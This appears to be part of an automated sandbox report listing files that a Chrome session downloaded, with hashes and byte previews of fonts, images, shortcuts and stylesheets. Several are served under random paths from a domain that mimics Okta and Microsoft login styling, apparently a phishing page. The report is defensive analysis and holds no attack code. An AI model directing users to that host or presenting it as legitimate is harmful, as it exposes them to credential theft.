                                    Preview:L..................F.@.. ...$+.,......`....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............D......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Aug 30 16:30:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2677
                                    Entropy (8bit):3.996634842374419
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:62A45D08C62372A2F927D82D1EB9E532
                                    SHA1:EDD615EAB5A20677A35BC1E7A9D631253F665442
                                    SHA-256:40589F33307F13959FCCA66F94D5D049ABE27B111F0797DF215CD653602705E7
                                    SHA-512:B7BF01E9C3FCB924915579B1EB521B8870D937E85DFDE390DD6F56CF29DD5E5AF57FDCC6774C05199780A50FD2BE64A12121F7F7D98675F49781624D5CA74D79
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:L..................F.@.. ...$+.,.......`....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............D......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Aug 30 16:30:58 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2679
                                    Entropy (8bit):4.004813102712757
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:7BE9F10C2C17497DE9878A7778FFE012
                                    SHA1:44E2FB310D14CF3CA44158F79BC77FE148E9311A
                                    SHA-256:0B9A9DBC8FDF92320740D96D9E3E588688423B56C42B079C23AEC58E72967B80
                                    SHA-512:A2862221237B6EF305654327A6E4919DDB8DD3BEF4D0BF13BF0C9E7143574CCB00FED6C32D5922492C67AC3A434D44761AE8ABE23843A00719398AF34FE97CAF
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:L..................F.@.. ...$+.,....eD.`....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............D......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                    Category:downloaded
                                    Size (bytes):93276
                                    Entropy (8bit):7.997636438159837
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:BCD7983EA5AA57C55F6758B4977983CB
                                    SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                    SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                    SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/efG1tIfbXSC1m634RPympFukl100
                                    Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:downloaded
                                    Size (bytes):128
                                    Entropy (8bit):4.750616928608237
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:D90F02F133E7B82AF89B3E58526AC459
                                    SHA1:F1D6D47EFE0D920F5BC5024E813554BD2F8A1650
                                    SHA-256:FCF0826E3EA7D24F6C73417BFF62AD84191ECC837DBFB10E60A2547580C3C14D
                                    SHA-512:83C187216CE1B44E23000DF4F25A4BAA7C5E0066E62C3E0D0203B013B5C26D097C6B225C58E345204B47E5E7BF34D4A8E60F7DF63D6083157C6CB9707DD9C41E
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwlgn4eXlftG0hIFDV9X_g0SBQ0TmyRjEkEJtk2r7Z3kXpQSBQ3PIyr_EgUNxZPEJBIFDYmlZ8sSBQ3DGTmQEgUNiaVnyxIFDcMZOZASBQ3QAkDsEgUNqF3jdA==?alt=proto
                                    Preview:ChIKBw1fV/4NGgAKBw0TmyRjGgAKSAoHDc8jKv8aAAoHDcWTxCQaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDdACQOwaAAoHDahd43QaAA==
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 2160 x 443, 8-bit/color RGBA, non-interlaced
                                    Category:downloaded
                                    Size (bytes):49602
                                    Entropy (8bit):7.881935507115631
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:DB783743CD246FF4D77F4A3694285989
                                    SHA1:B9466716904457641B7831868B47162D8D378D41
                                    SHA-256:5913B1EC0FC58AB2BEC576804B9E9B566A584EA3D21A1BF74A7B40051A447FDC
                                    SHA-512:E6F36C52996B6BF8B07C7A102DEF2D555A1D35FA12F1A2016EDD8F3C86C33DD3545513B436AB6B4EF1D1CAD8A5CA5D352BA587EEE605638640B258C3976D9033
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/ijXqR0TgqZfLZGejhmHztxneuabhmOf1pgGxxyaFPXnt62TFvBx8TIyRCW1TVtEGZ12210
                                    Preview:.PNG........IHDR...p..........{......sBIT....|.d.....pHYs..;...;...3.+....tEXtSoftware.www.inkscape.org..<... .IDATx...w.]U....L.I(!.B..J..R....PD.z-.(...4Q..*MQ. .(..EE.AP:.....HI.... ....ur3..r.Y.|....z..3.2.g..{..Y.V..6.u...U...Q.Z.X......m..........^......O.^l......Y.)`|...:......x.:."0r...H.W.....,.......j.....L%]s../4.>.<.........S.$I.$I.$I.T....*.(`s`S`.`C`mR..J...6.x.x.x..z9.......g..j}R...h.1.t]=....n..#.f.I.$I.$I.$I%c.G.. 5il.l.lCj.(S.F;.....7...AZ.@*B....%.E....C.be3..K....S."CI.$I.$I.$I...jV.v.v.v$5l..M.ysI......x{/i...Y...o..m.......v.6.>R..$I.$I.$I.......F.{..6v!...1{.Y..9ng...S..TF.I..;.o&5A.....&.w....$5J..M$I.$I.$I.$.........Q;..IQ...9n.nl.Z.e.......j.`hd..{..=p-p=n."I.$I.$I.$eg.G...........8...i......b. [.{.V.........V...96GI.$I.$I.$IY...c ..R...Q.q..,..........Gm........X=6NW......clp.I.$I.$I.$IZ*..g...s...c...F.A.<z*.Q.a...+.?....8.Xn.GO.$I.$I.$I..,O.l....@.....z.....R..a$.:...I.yb-....l....$I.$I.$I.$.....$.'S..j.p..3NBGX..M.3.?.......p$I.$
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                                    Category:downloaded
                                    Size (bytes):28000
                                    Entropy (8bit):7.99335735457429
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                                    SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                                    SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                                    SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/pqFaa7MVaQUaBWM19WD12wLZwx40
                                    Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:Unicode text, UTF-8 (with BOM) text
                                    Category:downloaded
                                    Size (bytes):23427
                                    Entropy (8bit):5.112735417225198
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:BA0537E9574725096AF97C27D7E54F76
                                    SHA1:BD46B47D74D344F435B5805114559D45979762D5
                                    SHA-256:4A7611BC677873A0F87FE21727BC3A2A43F57A5DED3B10CE33A0F371A2E6030F
                                    SHA-512:FC43F1A6B95E1CE005A8EFCDB0D38DF8CC12189BEAC18099FD97C278D254D5DA4C24556BD06515D9D6CA495DDB630A052AEFC0BB73D6ED15DEBC0FB1E8E208E7
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://www.w3schools.com/w3css/4/w3.css
                                    Preview:./* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */.html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}./* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */.html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}.article,aside,details,figcaption,figure,footer,header,main,menu,nav,section{display:block}summary{display:list-item}.audio,canvas,progress,video{display:inline-block}progress{vertical-align:baseline}.audio:not([controls]){display:none;height:0}[hidden],template{display:none}.a{background-color:transparent}a:active,a:hover{outline-width:0}.abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}.b,strong{font-weight:bolder}dfn{font-style:italic}mark{background:#ff0;color:#000}.small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}.sub{bottom:-0.25em}sup{top:-0.5em}figure{margin:1em 40px}img{border-style:none}.code,kbd,p
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                    Category:dropped
                                    Size (bytes):61
                                    Entropy (8bit):3.990210155325004
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:SVG Scalable Vector Graphics image
                                    Category:downloaded
                                    Size (bytes):1864
                                    Entropy (8bit):5.222032823730197
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:BC3D32A696895F78C19DF6C717586A5D
                                    SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                    SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                    SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/klWThlpoBQ2wTEgHE3lGTgysOkz5URLhtolf2KQNij9IieZBfDDg9wDI3LQ2LY6So22Euv215
                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:SVG Scalable Vector Graphics image
                                    Category:downloaded
                                    Size (bytes):2905
                                    Entropy (8bit):3.962263100945339
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:FE87496CC7A44412F7893A72099C120A
                                    SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                    SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                    SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/yzv2W6Q2eWTMYbWVWVnbymnApcTLAKB98rxUHabab180
                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:SVG Scalable Vector Graphics image
                                    Category:downloaded
                                    Size (bytes):270
                                    Entropy (8bit):4.840496990713235
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:40EB39126300B56BF66C20EE75B54093
                                    SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                    SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                    SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/mnrggFFHtx5guxzVHbaAx4ELtdqTSpEouv9oeRvgL9RgzCyFzGNfarz78150
                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 72 x 15, 8-bit/color RGB, non-interlaced
                                    Category:dropped
                                    Size (bytes):61
                                    Entropy (8bit):4.035372245524405
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:A89E333BF32FD8297A0F647CA0000C5A
                                    SHA1:B8D6008F3F41BB45C8CA92A4F157BE0B30B912DE
                                    SHA-256:823B3771614718430145B41092FA4EFB5B87E8E79E070C8BC6424AE20F4FD3FF
                                    SHA-512:69E6ADF32ECD734A3ACD0D18398DE9D524666F7B01ED804E6CE337BAC9D6BEF0F365B9F766CAA255D525C5A9E52E58FCF619A8C22C284D5ABD9BBF48DC2443EF
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:.PNG........IHDR...H.................IDAT.....$.....IEND.B`.
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (10450)
                                    Category:downloaded
                                    Size (bytes):10498
                                    Entropy (8bit):5.327380141461276
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:E0D37A504604EF874BAD26435D62011F
                                    SHA1:4301F0D2B729AE22ADECE657D79ECCAA25F429B1
                                    SHA-256:C39FF65E2A102E644EB0BF2E31D2BAD3D18F7AFB25B3B9BA7A4D46263A711179
                                    SHA-512:EF838FD58E0D12596726894AB9418C1FBE31833C187C3323EBFD432970EB1593363513F12114E78E008012CDEF15B504D603AFE4BB10AE5C47674045ACC5221E
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css
                                    Preview:a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,th,thead,tr,tt,u,ul,var{background:transparent;border:0;font-size:100%;font:inherit;margin:0;outline:0;padding:0;vertical-align:baseline}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}:focus{outline:0}ins{text-decoration:none}del{text-decoration:line-through}table{border-collapse:collapse;border-spacing:0}input[type=hidden]{display:none!important}input[type=checkbox],input[type=radio]{border:0!important;margin:0;padding:0}@font-face{font-family:Proxima Nova;font-style:normal;font-weight:400;src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot);src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot?#iefix) fo
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (23648), with no line terminators
                                    Category:downloaded
                                    Size (bytes):23648
                                    Entropy (8bit):5.105432676683315
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:EA5F78F2084AC770BD4E43FC794ABEFD
                                    SHA1:3C5D30F496503CA89833A14151C2A9F8A7F72C5E
                                    SHA-256:D1747D1FD3044146713D389FBC34CFCCC3552A39F4A6505BD8817FD20BB48052
                                    SHA-512:DEDE8D95C6A7044B8E7EF5C39B5DD63FB4DD01C93DF3D34BA44B1FE73A99EC27B60E41C217AF00FA562A6DADA290000EA45C224BF6E278E717D04936D58798F0
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/34YOSnhY5xyJbcpf8920
                                    Preview:#authcalldesc,#sections,.text-m{font-size:.9375rem}*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}*,input{margin:0}.p,.subtitle,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy,#sections_pdf{display:flex;flex-direc
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:Web Open Font Format (Version 2), TrueType, length 20416, version 2.197
                                    Category:downloaded
                                    Size (bytes):20416
                                    Entropy (8bit):7.99050164976329
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:D99A7377DABB55772CA9F986B0A04B57
                                    SHA1:2B5FCD8431953C44E410D0489899E74F6D2CFECC
                                    SHA-256:AFFDBA1620552B12A1A8A04467136AEB408C03FA337D20E9C38374D682D4D149
                                    SHA-512:CB80EBC6424029C45E86DDF6C18EB43284605678EDE88119301CC6493C21E282CACE48FD849FC14E5D73C6AECF83645CC3A58051D5D8E22197E09912A41E3130
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://ok4static.oktacdn.com/assets/loginpage/font/assets/proximanova-reg-webfont.353416ed0ff540352235.woff2
                                    Preview:wOF2......O..........OS........................?FFTM..2..,....`..b.@..e.....|..h.6.$..*..X.. .....n..p?webf....5x.(-....O.)G......G"............!c...toeA0......H.h....rM...I....h.k........^F6F#.f.._....P.E..mz..`p..|4...eG..:c ........e.|...:?.......I.$.N{VR.....wP........N.h.IA,k.!D..Y.p..8.B.eH..~...W.>.%.`.FK..e...[..?L4S]X.L...T`a....ff],.+...;..1.......`......D.V...4.T9t*...U.A6).......?.....b.T........+...w..8....y ..7eT.....]{....'P..`.bn.......FR..(H.H.(...`507..\..[.........L.Y....)3HK..Bi.r_.+...T....w.M...=.0C...ev._..E.}F.01*..Q..(....9......a.H3.8j...u.(..X.-p,.9..B.s..n..}oY.d.+{\........}.c...X.....,.,s.+.O......V.D.....}......$'....S6.V.c.4.s..*]..v...juo..=.r@...........l.....d..( ;@d..j..E....K..e..l.4e.OU...@X...Y..u)....u..j......H...2..^Q.......(i.".]J....1V...X....1...r@...\.%....mQCSLQ.(..C.1.........[...(o+oJ..%.#...1...o...4.......e..~^}~....K....t.2.2t..8.q....<=G.{......:...{....Q1v..Q.\...#.N.......o.e..\].1)Q
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):231
                                    Entropy (8bit):6.725074433303473
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:547988BAC5584B4608466D761E16F370
                                    SHA1:C11BB71049702528402A31027F200184910A7E23
                                    SHA-256:70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
                                    SHA-512:C4A76F6E94982D1CC02C2B67523A334E76BFDE525C1014D32DB9E7ECA0FA39A06F291ECFA94C8C6A49D488EA3ACF9C10DDF3CAD9515562010440863D0F08FBA3
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:.PNG........IHDR..............w=.....sRGB.........IDATHK...1...Z......... #$#..-.. $$3..H...q.x.>.x..yY.|.@h.......$.B/..*Ec...J.}.....Rl..^.......#-...f.6p.cJigf...G.<.!.z..>a.+j....&U.....E/.._.`.d...~_....7...4`....IEND.B`.
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 506 x 303, 8-bit/color RGBA, non-interlaced
                                    Category:downloaded
                                    Size (bytes):29796
                                    Entropy (8bit):7.980058333789969
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:210433A8774859368F3A7B86D125A2A7
                                    SHA1:408BACDDC39F12CAD285579C102FE4A629862D88
                                    SHA-256:9C6ADDFC339CE1C1D262290AB4CC2DE8D38D4B54B11A8E85AFD44FBB0ACC2561
                                    SHA-512:6CBF6492BBA0734ECE1B595743B7A251D3C98425A36D5BF87EBFAD17BE979A23ADEE556FB074EF6D284052F6412ACEDA4E179FB7DFA0BA1103610CC01113A1A3
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/qrYLb650e94kpXwA4XFWfvn6Klr5vGxUBRt12JyRMFNWzkfqNjLbCIb0kT8KGX2ef238
